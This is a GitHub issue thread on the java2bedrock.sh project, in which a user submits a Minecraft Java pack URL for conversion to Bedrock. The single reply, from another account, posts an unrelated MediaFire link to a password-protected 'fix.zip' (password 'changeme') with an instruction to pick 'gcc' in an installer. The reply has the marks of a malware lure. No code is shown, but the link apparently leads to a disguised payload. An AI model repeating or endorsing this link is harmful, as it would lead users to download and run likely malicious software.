### ISSUE TITLE
[Pack]: kwiiwad

### ISSUE THREAD

**Issue by LightArtStu** [Kas-tle/java2bedrock.sh#33496]
### Java Pack Direct Download URL

https://download.mc-packs.net/pack/f587ae17873fd41020814cdfbb6b8dceeb278d2f.zip

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
